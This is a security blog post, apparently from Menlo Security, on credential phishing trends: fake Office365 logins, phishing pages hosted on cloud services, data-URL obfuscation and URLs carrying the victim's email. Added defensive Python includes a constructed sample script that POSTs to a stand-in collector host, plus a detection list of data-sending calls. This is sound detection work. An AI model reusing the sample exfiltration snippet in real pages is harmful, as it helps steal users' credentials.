Credentials Phishing Attacks

In the last month, researchers at Menlo Security have been observing a steady rise in credential phishing attacks. This is a popular attack method where attackers make use of fake login pages or forms to steal credentials of commonly used services in a corporate environment.

Apart from commonly targeted cloud services like Office 365, Amazon Prime, Adobe and others, Menlo also noticed credential phishing attacks impersonating software services commonly used in other countries, such as South Korea, as well as cryptocurrency wallets.

Office365 Continues To Be The #1 Phishing Target

It may not be a surprise to learn that, in the last month, the bulk of the credential phishing attacks served fake Outlook and Office365 login pages. This is mostly because of the ubiquity of the Office365 service across the corporate sector. Other notable phishing attack incidents included:

Phishing On Cloud Services: There is an uptick in the number of phishing pages being hosted on popular cloud services. While services like Azure, OneDrive, Box, Firebase, and Dropbox continue to be leveraged to host phishing pages, one interesting addition to this list we came across last month was a phishing page hosted on the popular note-taking app Evernote.

Phishing Tactics: Attackers are always trying to come up with tactics to bypass detection solutions. Below, we describe a few common tactics that are actively being used to serve phishing content.

Use of Data URLs/Encoding To Mask Content: In the HTML content of one specific phishing page, we observed the use of data URLs to:

  • Hide the actual JavaScript code that posts credentials to a remote URL.
  • Encode and embed all custom CSS/Images on the page itself

The advantages of using this mechanism are as follows:

  • Allows the entire phishing page content to be rendered on a browser in a single load within the client. 
  • Adding the “Content-Encoding: gzip” header allows the server to send the compressed response. 
  • There would be no additional resource requests (JavaScript, CSS, images, etc.).
  • This is an attempt to evade solutions that rely on the “Content-Type” header to determine resources like JavaScript/CSS.
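To illustrate the defensive side of this tactic, the following added example (not code from Menlo Security or the original article) inspects HTML for `src`/`href` attributes that carry data URLs, decodes them, and reports the media type declared inside the URL itself rather than in a response header. The sample page, the `collector.example` host and the `SEND_HINTS` heuristic list are constructed assumptions.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

DATA_URL = re.compile(r"^data:([^,]*),(.*)$", re.S | re.I)
# Assumed heuristic: strings suggesting the decoded script sends data off-page.
SEND_HINTS = (b"XMLHttpRequest", b"fetch(", b"sendBeacon", b".submit(")

def decode_data_url(url):
    """Decode an RFC 2397 data: URL into (media_type, payload_bytes), else None."""
    m = DATA_URL.match(url.strip())
    if not m:
        return None
    params = [p.strip().lower() for p in m.group(1).split(";")]
    raw = unquote_to_bytes(m.group(2))
    if "base64" in params[1:]:
        raw = re.sub(rb"\s+", b"", raw).rstrip(b"=")
        try:
            raw = base64.b64decode(raw + b"=" * (-len(raw) % 4))
        except binascii.Error:
            return None
    return params[0] or "text/plain", raw

class DataUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            decoded = decode_data_url(value) if name in ("src", "href") and value else None
            if decoded:
                media_type, payload = decoded
                hints = [h.decode() for h in SEND_HINTS if h in payload]
                self.findings.append((tag, media_type, len(payload), hints))

def scan(html):
    """Return (tag, media_type, payload_length, send_hints) per inline data: URL."""
    finder = DataUrlFinder()
    finder.feed(html)
    return finder.findings

# Constructed sample page: stylesheet and script embedded inline as data URLs.
_JS = b'var r=new XMLHttpRequest();r.open("POST","https://collector.example/c");'
SAMPLE = ('<html><head><link rel="stylesheet" href="data:text/css;base64,%s">'
          '<script src="data:text/javascript;base64,%s"></script></head>'
          '<body><form><input type="password" name="pw"></form></body></html>'
          ) % (base64.b64encode(b"body{margin:0}").decode(), base64.b64encode(_JS).decode())
```

A page that contains a password field and an inline script with send hints, while making no external script requests, is the combination worth alerting on.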

Dynamic Content Generation: One interesting tactic was observed in an Office365 phishing campaign: the campaign appears to append the user’s email address to the URL, the phishing page path is dynamically generated, and the user’s email address is filled in automatically.
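A detection sketch for this tactic, added here as an example and not taken from Menlo Security or the original article: it flags URLs on non-corporate hosts that carry a corporate email address in the path, query or fragment. It goes beyond the case described by also decoding base64 tokens, and the `corp.example` domain, host names and sample URLs are constructed assumptions.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Candidate base64 / base64url tokens long enough to hold an address.
B64_TOKEN = re.compile(r"[A-Za-z0-9_\-+/]{16,}={0,2}")

def emails_in_url(url):
    """Return sorted (location, address) pairs found in path, query or fragment."""
    parts = urlsplit(url)
    found = set()
    for location in ("path", "query", "fragment"):
        text = unquote(getattr(parts, location))
        found.update((location, a.lower()) for a in EMAIL.findall(text))
        for token in B64_TOKEN.findall(text):
            body = token.rstrip("=")
            try:
                decoded = base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)).decode("ascii")
            except ValueError:  # covers bad base64 and non-ASCII output
                continue
            found.update((location + ":base64", a.lower()) for a in EMAIL.findall(decoded))
    return sorted(found)

def flag(url, corp_domains):
    """Corporate addresses embedded in a URL whose host is not a corporate host."""
    host = (urlsplit(url).hostname or "").lower()
    if any(host == d or host.endswith("." + d) for d in corp_domains):
        return []
    return [(loc, a) for loc, a in emails_in_url(url) if a.split("@")[1] in corp_domains]

# Constructed sample URLs, e.g. as extracted from email bodies or proxy logs.
SAMPLE_URLS = [
    "https://login.phish.example/x7Gq2/#alice@corp.example",
    "https://portal.phish.example/o365/?e=" + base64.b64encode(b"bob@corp.example").decode(),
    "https://intranet.corp.example/profile?user=carol@corp.example",
    "https://news.example/article?id=42",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u, flag(u, {"corp.example"}))
```

URL fragments are not sent to the server, so the fragment case only shows up in sources that see the full link, such as mail gateway URL extraction or browser telemetry.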

Conclusion

Cyber criminals are trying to add complexity in order to carry out phishing campaigns that steal sensitive information. With free services like Let’s Encrypt, it’s becoming increasingly easy for attackers to host phishing sites behind SSL with a relatively short TTL for maximum hit rate.

Increasing cyber security awareness through training and education initiatives is very helpful in reducing the impact of credential phishing attacks, but corporate users should always be cautious when a site presents a form that asks for personal or sensitive information.

Menlo Security:      
